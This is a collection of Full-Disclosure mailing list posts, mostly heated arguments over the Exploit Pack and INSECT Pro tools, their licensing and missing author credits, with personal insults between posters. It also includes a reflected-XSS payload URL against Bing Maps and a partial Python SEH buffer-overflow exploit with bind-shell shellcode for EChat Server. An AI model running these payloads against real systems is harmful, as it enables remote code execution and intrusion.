Re: [Full-disclosure] FW: Curso online - Profesional pentesting - Promocion ( 25% de descuento )
Michele Orru.. Sorry to write you directly to the list.. But you did it too.. So.. please allow me to answer.. Exploit Pack != Beef ... Just similar projects.. different approaches In fact you came to a webcast where I showed the code of Exploit Pack... I remember you saying that Exploit Pack is a cool project... Please check out our javascript agent... http://www.exploitpack.com/Gate/jsacco.js http://www.exploitpack.com/Gate/PLAINdoMagic.js I am not pointing you with a gun.. if you don not like Exploit Pack tools.. just do not use our tools... In my personal opinion, beef is a good project, in fact I am a big fan of it. But it doesnt work like i want it, beef cannot handle more than 10 bots.. almost all the times I run the ruby project it crashes.. also some modules doesnt work either.. the popup persistent is old and do not work on recent browsers.. among other things.. Also beef doesnt have any module for defense like clientside SQLi / XSS protection... SQLi: http://www.youtube.com/watch?v=kD2gI8giOQA XSS: http://www.youtube.com/watch?v=1rYy5SA9PPsfeature=relmfu Regards JSacco On Sun, May 20, 2012 at 7:40 AM, Michele Orru antisnatc...@gmail.comwrote: An btw, his WebSecurity tool is a pure clone of BeEF. If you try it, and analyze the Javascript hook file, is the same thing. He just change the global variable name from beef to bot, leaving everything else :D including the BeEF version he used to copy from. LOL. On Sun, May 20, 2012 at 8:30 AM, BMF badmotherfs...@gmail.com wrote: Actually, this Juan Sacco assclown has been pissing me off too. I'm in some group with him on linkedin and getting his messages. I keep flagging them as spam. I wish I knew how to get him to stop emailing and messaging me. Juan: Knock it off, you disaffected deleterious douchenozzle. On Sat, May 19, 2012 at 10:44 AM, Charles Morris cmor...@cs.odu.edu wrote: I request your permission to test any and all of your facilities in any way I deem appropriate including (by not limited to) your personal machines, the machines of your coworkers and family, and any other device I deem within scope of my testing. Further, I request you to grant full, unlimited access and authorization for me to test these devices in any way I see fit with full unadulterated impunity. stop flexing ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Video tutorial: Stack-Based Buffer Overflow
I've made a video tutorial about buffer overflows take a look and share it if you like it! Video tutorial: http://www.youtube.com/watch?v=yPKCSXK8ZYo Enjoy! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
If you want the right to demand certain things from the program, then go BUY a program and do not harass people who are writing software for free, or go and help the developers by writing the functionality yourself. Juan Sacco On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it under the terms of the +#GNU General Public License as published by the Free Software Foundation, either version 3 +#or any later version. +# +#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR +#PURPOSE. See the GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License along with this program. +#If not, see http://www.gnu.org/licenses/ Ys why not? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
As you might know, or not know, Exploit Pack is working without any foundation, company, governement and money-giving guy. There is no professionnal coder, programmer that is paid to develop this program. I have tried to ensure that the name of the exploit author is seen in all the software.It was my bad pasting the license there, but hey! Im human give me a break you troll. The next time would be better if you post it in the right place, GitHub. And in fact youre trying to blame here. Exploit Pack is licensed GPL let me copy paste the 4 freedoms. I hope to do it well this time. The freedom to run the program, for any purpose (freedom 0). The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this. The freedom to redistribute copies so you can help your neighbor (freedom 2). The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this. Let me ask you why you are spending so much time annoying this GPL software? I hope next time get a patch of code from you and no nonsense again. Like I said to lroot. The same goes for YOU. If you want the right to demand certain things from the program, then go BUY a program and do not harass people who are writing software for free, or go and help the developers by writing the functionality yourself. Juan Sacco On Wed, Oct 5, 2011 at 6:36 PM, xD 0x41 sec...@gmail.com wrote: wow i was not going to comment on that pack and have not yet looked but, thats plain nasty... to remove a simple credit line, i mean it is not full of greetz etc :s and replace... totally pathetic. On 5 October 2011 20:32, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it under the terms of the +#GNU General Public License as published by the Free Software Foundation, either version 3 +#or any later version. +# +#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR +#PURPOSE. See the GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License along with this program. +#If not, see http://www.gnu.org/licenses/ Ys why not? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Hey, Its really a shame that you didn't even take like 2 minutes to watch the source code of Exploit Pack before create an opinion. This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack JAVA. See the diference? Also, please take a look at the interface design, both are really different. Show me where Exploit Pack is similar to Canvas! I think you spent too much time looking for Waldo :-D We respect the exploit author and that is why I add them at the first line of the XML file You should run the program before creating this crappy post with your nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) Take a look if you want: ?xml version=1.0 encoding=UTF-8? Module Exploit NameXML=Free Float FTP Server CodeName=FreeFloatFTPServer.py Platform=windows Service=ftp Type=remote RemotePort=21 LocalPort= ShellcodeAvailable=R ShellPort= SpecialArgs= /Exploit Information Author=Blake Date=August 23 2011 Vulnerability=N/A Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. /Information JSacco On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote: Heya jeff, The author is clearly not smart. He is copying other codes, this is a plain rip off of canvas...hehe... and same with his insect pro... he stole metasplit for tht one, then he wants repect, when we see him removing simplly one line wich would atleast say a ty and, show [ppl who writes, is maybe sometimes stabler than other authors, it would be better to have this in, not out.. he should be able to see thats how it works with exploit code/pocs in general... sometimes, if i see php code from one person, i will tend to look, but if it was from an unknown person, i prolly wouldnt. But this (open sauce) project, i will download and waste 5minutes on. Then illm go back to Backbox and BT5 and things wich work :) hehe (this guy is really mad about his app... and i mean, dang mad angry! I will buy some tissues and send to him, that is my donation for his app) :)) xd On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it under the terms of the +#GNU General Public License as published by the Free Software Foundation, either version 3 +#or any later version. +# +#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR +#PURPOSE. See the GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License along with this program. +#If not, see http://www.gnu.org/licenses/ GPL V3 - they had to encumber it to set it free? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Hey.. I already gave you an answer about this. AGAIN. For the last time. I respect the author's name of all the exploits added to Exploit Pack, like you suggest in a terrible and way.. Insulting and posting like 10 mail to the this list. I will add a # Thank you [AUTHOR NAME ] for let us use your public script in the top of all new exploit added to Exploit Pack Framework. ** Also, I created a mailing list to discuss this kind of things, report bugs and much more ( But sorry, NO INSULTING is allowed there ) ** As other people told you stop doing chatting here. This is not a forum. JSacco On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41 sec...@gmail.com wrote: Information Author=Blake Date=August 23 2011 Vulnerability=N/A Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. /Information erm, sorry this dont count, it should be IN the code, not, after running it :P thats bs mate, and i wont agree with your crap, until you see my point really. It is, something you write, compared to running thwe GUI.. xd On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote: Hey, Its really a shame that you didn't even take like 2 minutes to watch the source code of Exploit Pack before create an opinion. This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack JAVA. See the diference? Also, please take a look at the interface design, both are really different. Show me where Exploit Pack is similar to Canvas! I think you spent too much time looking for Waldo :-D We respect the exploit author and that is why I add them at the first line of the XML file You should run the program before creating this crappy post with your nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) Take a look if you want: ?xml version=1.0 encoding=UTF-8? Module Exploit NameXML=Free Float FTP Server CodeName=FreeFloatFTPServer.py Platform=windows Service=ftp Type=remote RemotePort=21 LocalPort= ShellcodeAvailable=R ShellPort= SpecialArgs= /Exploit Information Author=Blake Date=August 23 2011 Vulnerability=N/A Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. /Information JSacco On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote: Heya jeff, The author is clearly not smart. He is copying other codes, this is a plain rip off of canvas...hehe... and same with his insect pro... he stole metasplit for tht one, then he wants repect, when we see him removing simplly one line wich would atleast say a ty and, show [ppl who writes, is maybe sometimes stabler than other authors, it would be better to have this in, not out.. he should be able to see thats how it works with exploit code/pocs in general... sometimes, if i see php code from one person, i will tend to look, but if it was from an unknown person, i prolly wouldnt. But this (open sauce) project, i will download and waste 5minutes on. Then illm go back to Backbox and BT5 and things wich work :) hehe (this guy is really mad about his app... and i mean, dang mad angry! I will buy some tissues and send to him, that is my donation for his app) :)) xd On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it under the terms of the +#GNU General Public License as published by the Free Software Foundation, either version 3 +#or any later version. +# +#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR +#PURPOSE. See the GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License along with this program. +#If not, see http://www.gnu.org/licenses/ GPL V3 - they had to encumber it to set it free? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http
Re: [Full-disclosure] New open source Security Framework
Hey, Wanna Join? and contribute to a with a GPL Project? Welcome aboard!!! ( Please do me a favor and read the license first ) Wanna keep talking about your personal opinion? Please.. As it was told stop doing it here, this is not a chatroom. We have a forum and a mailing list for that. It would be nice to see you there... Believe me. I invite you all to the new forum! :-) http://exploitpack.com Cheers! On Wed, Oct 5, 2011 at 8:55 PM, xD 0x41 sec...@gmail.com wrote: Juan, I have not created any opinion (yet) but, is it rally fair, to give people who code, 2 frigging dollars, for sometimes what would be 0day , or is it nice, to remove the REAL auithors name, and add your own. Thats the only grips i see, without having to look at it yet. The whole look of it, without 'using' it tho, looks alot like canvas ;p but, thats not bad thing and, i personally, dont mind that, coz canvas, is not open and, this one is, wich would be great to bring that feel into it.. so, your reading tomuch into things, when i mean giving credit to author, i dont mean putting in his email/greetings and notes, i mean, simply one line to give credit, so people who are using the pack, could atleastfeel sure with some coders,that the code will be very nice, and not painful to read or , modify even to make it nicer.. that is why i like to always makesure authors get some credit, however it may be, it only needbe a nick/name, but you are using theyre things, but on your people who your paying, i guess you should maybe put in place then rules that, all exploits paid for, would not recieve credits, other than, part of devteam or part of exploit-pack codepack. It aint hard to keep people happy. Whilst still producing quality, or, non quality. i will run your pack, using ONE well know exploit, and if that fails, i will have results here, compared to backbox scan or, another vuln scan, then, i will comment further. How does that sound? Ok. I will do my research, but, i aint angry at you, nor the product, altho i dislike Insect, this one, seems to have some good features. So yea, ill take an open look, i only think, if code is NOT paid for, then you should put authors name or handle in there somwhere, maybe even something for paid exploits... people do appreciate a 'thanks to' sometimes... especially you it seems. xd On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote: Hey, Its really a shame that you didn't even take like 2 minutes to watch the source code of Exploit Pack before create an opinion. This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack JAVA. See the diference? Also, please take a look at the interface design, both are really different. Show me where Exploit Pack is similar to Canvas! I think you spent too much time looking for Waldo :-D We respect the exploit author and that is why I add them at the first line of the XML file You should run the program before creating this crappy post with your nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) Take a look if you want: ?xml version=1.0 encoding=UTF-8? Module Exploit NameXML=Free Float FTP Server CodeName=FreeFloatFTPServer.py Platform=windows Service=ftp Type=remote RemotePort=21 LocalPort= ShellcodeAvailable=R ShellPort= SpecialArgs= /Exploit Information Author=Blake Date=August 23 2011 Vulnerability=N/A Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. /Information JSacco On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote: Heya jeff, The author is clearly not smart. He is copying other codes, this is a plain rip off of canvas...hehe... and same with his insect pro... he stole metasplit for tht one, then he wants repect, when we see him removing simplly one line wich would atleast say a ty and, show [ppl who writes, is maybe sometimes stabler than other authors, it would be better to have this in, not out.. he should be able to see thats how it works with exploit code/pocs in general... sometimes, if i see php code from one person, i will tend to look, but if it was from an unknown person, i prolly wouldnt. But this (open sauce) project, i will download and waste 5minutes on. Then illm go back to Backbox and BT5 and things wich work :) hehe (this guy is really mad about his app... and i mean, dang mad angry! I will buy some tissues and send to him, that is my donation for his app) :)) xd On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten
Re: [Full-disclosure] New open source Security Framework
ro...@fibertel.com : I know you don't have any experience with open source projects, but this is not the right way. Next time you should try doing it well. Go to GitHub and write the change your own. The community will moderate it and then you will see your proposal applied. To be clear. The license on the script you mention is the license for all the software not only for the script. Oki Dokie? 1. This is not a chatting room 2. This is not Exploit Pack Dev list Having that in mind: If you feel like you have to really make another nonsense question after you read all the thread. Then and just then. Send a email to Exploit Pack Dev list. Please check: http://exploitpack.com/faq And: http://www.gnu.org/licenses/gpl-3.0.html if you continue having question about GPL v3 I already make a change on the git repository for you root ro...@fibertel.com.ar and your friend xD 0x41 sec...@gmail.com, hope next time you expend two cent for this project. https://github.com/exploitpack/trunk/blob/master/https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/exploits/code/EasyFTPServer1.7.11.py #You should have received a copy of the GNU General Public License along with this program. #If not, see http://www.gnu.org/licenses/ # Script Author: [Coder Name] # Thanks for let us use this script on Exploit Pack JSacco On Thu, Oct 6, 2011 at 12:34 AM, root ro...@fibertel.com.ar wrote: Juan, You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely. Software business steal code all the time, but they don't release the software for everybody to see! Next time instead of a few laughs at a list, you may get sued and lose real money, you fool. Please learn how licensing works and just then republish all your code. On 10/05/2011 06:25 PM, Juan Sacco wrote: If you want the right to demand certain things from the program, then go BUY a program and do not harass people who are writing software for free, or go and help the developers by writing the functionality yourself. Juan Sacco On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it under the terms of the +#GNU General Public License as published by the Free Software Foundation, either version 3 +#or any later version. +# +#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR +#PURPOSE. See the GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License along with this program. +#If not, see http://www.gnu.org/licenses/ Ys why not? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
You are comparing a new product with others who have years of development, it is not fair. If you like Core Impact or Metrasploit Express, please pay your license and use them. I'm not pushing you to use my software. INSECT Pro is free and I do it because I like it. Not to like you. Juan Sacco ( runlvl ) On Mon, 29 Aug 2011 13:24:15 -0300, root wrote: On 08/27/2011 08:54 AM, Mario Vilas wrote: On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is smeone going to warez this... it aint free.. http://www.insecurityresearch.com/files/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ It's just a GUI slapped to a bunch of public exploits taken from metasploit and exploit-db. Totally unlike serious software like metasploit-pro and core impact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
Hey Gage, bad day huh? I don't argue with people on mailing list. You are taking INSECT Pro too personal, take it easy. If you like it, use it, if you dont like it dont use it, if you can do it better, do it. Good luck. Juan Sacco ( runlvl ) On Mon, 29 Aug 2011 16:53:56 -0700, Gage Bystrom wrote: People hate you because you've been stealing software, slapping a new wrapper on it, and calling it your own. All other complaints, criticisms, or even approvals is nothing in light of that simple fact. A light that was cast the first time you released InsectPro to FD and all you got was a horde of angry researchers telling you to shutup and stop sending stupid crap like your stolen software to FD. No one is telling you to not use, hell only a few people are telling you not to share it. But almost everybody is telling you to KEEP CRAP LIKE THIS OFF FULL DISCLOSURE. You can argue the crap point all you want and be dismissive, but you'll just be missing the point. On Mon, Aug 29, 2011 at 9:45 AM, Juan Sacco jsa...@insecurityresearch.com wrote: You are comparing a new product with others who have years of development, it is not fair. If you like Core Impact or Metrasploit Express, please pay your license and use them. I'm not pushing you to use my software. INSECT Pro is free and I do it because I like it. Not to like you. Juan Sacco ( runlvl ) On Mon, 29 Aug 2011 13:24:15 -0300, root wrote: On 08/27/2011 08:54 AM, Mario Vilas wrote: On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is smeone going to warez this... it aint free.. http://www.insecurityresearch.com/files/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ It's just a GUI slapped to a bunch of public exploits taken from metasploit and exploit-db. Totally unlike serious software like metasploit-pro and core impact. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
INSECT Pro uses native exploits and these are taken from the Internet, modified and tested to work with our tool, the sources of these exploits are exploit-db and securityfocus in most cases. Also has support for some modules of metasploit. If you look at INSECT PRO exploit description you could check the source of each one, native or metasploit This isnt a company making a big product, Im doing this because I like doing it. I'm not forcing you to use my software, if you don't like it please don't waste bandwith on it. We are working on a JAVA version in order to support multi-plataform, and because I really like to JAVA We are a small group of developers so we do this on baby steps, we dont like to receive that kind of critic from people like you, you should try to help instead of drop shit all around the internet Juan Sacco ( runlvl ) -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.7 was released stay tunned On Sun, 28 Aug 2011 22:43:00 +0100, Jacqui Caren-home wrote: On 27/08/2011 23:12, Dan Dart wrote: Looks like it's freeWARE but not free per se. With the added disadvantage that it runs on none of the platforms I use. How sad. 0/5 review from me then. http://www.insecurityresearch.com/files/download/ From the readme's its an old version of metasploit under a wrapper. Also anyone from tightvnc want to see if gpl-violations are interested? INSECT Pro/exploits/framework/msf3/external/source/tightvnc/LICENCE.TXT GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
We are happy to announce a new release of INSECT Pro 2.7 including changes that people ask about most often This is a partial list of the major changes implented in version 2.7 - Available targets now has a submenu under right-click button - Check update function added in order to verify current version - Threading support for GET request - Module log added and functional - Sniffer support added - 50 Remote exploits added - Project saved on userland - Application Data special folder - Executed module windows added and functionality for it - AgentConnect now use telnetlib Download now from: http://www.insecurityresearch.com Juan Sacco (runlvl) -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.7 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Advisory 2011 0823 - Zero day - XSS in BING.COM
Information Name : XSS Reflected on BING.COM Software : BING.COM MAPS Vendor Homepage : http://www.bing.com Vulnerability Type : XSS Reflected Severity : Very High Researcher : Juan Sacco (runlvl) jsacco [at] insecurityresearch [dot] com Description -- BING.COM is prone to a XSS vulnerability because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the victim's browser. Details --- The reflected XSS vulnerability is a variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is exectued by the browser, and then displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read Exploit example as follow - http://www.bing.com/maps/embed/Customize.aspx ?v=2 cp=-34.584743~-58.457621 lvl=6 dir=0 sty=c eo= where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))///SCRIPT form=LMLTEW The vulnerability is caused by the following code and affected by the Generate Code map div id=LME_mapLinks style=line-height: 20px a id=LME_largerMap //--gt;quot;gt;'gt; on Bing Maps (New window)View Larger Map/a /div Solution --- No patch are available at this time. Credits --- Manual discovered by Insecurity Research Labs Juan Sacco (runlvl) - http://www.insecurityresearch.com -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Free tool for penetration security testing
INSECT Pro is a new free tool for Penetration Testing and the ultimate resource to demonstrate the security or vulnerability of your network. INSECT Pro goes beyond simply detecting vulnerabilities to safely exploiting them. The first free integrated vulnerability and penetration testing tool, INSECT is part of the complete solution Insecurity Research offers to evaluate the vulnerabilities on your network. Download now your copy from http://www.insecurityresearch.com and try to defeat and test your network security If you want to colaborate please write us an email to: insect...@insecurityresearch.com or join to our mailing list Why is free? We have two new members in our team and that allow us to keep working and follow our own way. We think that no one should charge for knowledge. Of course we have to pay bills, like web space among other things. Insecurity Research is an innovator in software development, our products include exploitation development tools, vulnerability assessment and remote control technologies. Juan Sacco ( runlvl ) -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Exploit EChat Server = v2.5 20110812 - Remote Buffer Overflow Exploit
Information
Name : EChat Server = v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) jsacco [at] insecurityresearch [dot]
com
Description
--
EChat Server is prone to a remote buffer-overflow vulnerability because
it fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.
Exploit example as follow
-
#!/usr/bin/python
# Easy Chat Server Server = v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsa...@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
import string, sys
import socket, httplib
import telnetlib
def howtousage():
print Sorry, required arguments: Host Port
sys.exit(-1)
def run():
try:
# Basic structure: JUNK + NSEH + SEH + SHELLCODE
Junk = '\x41' * 216 # 216 bytes of A
nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret
# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
ShellCode = (
\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43
\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34
\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41
\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58
\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30
\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45
\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b
\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51
\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c
\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54
\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b
\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c
\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51
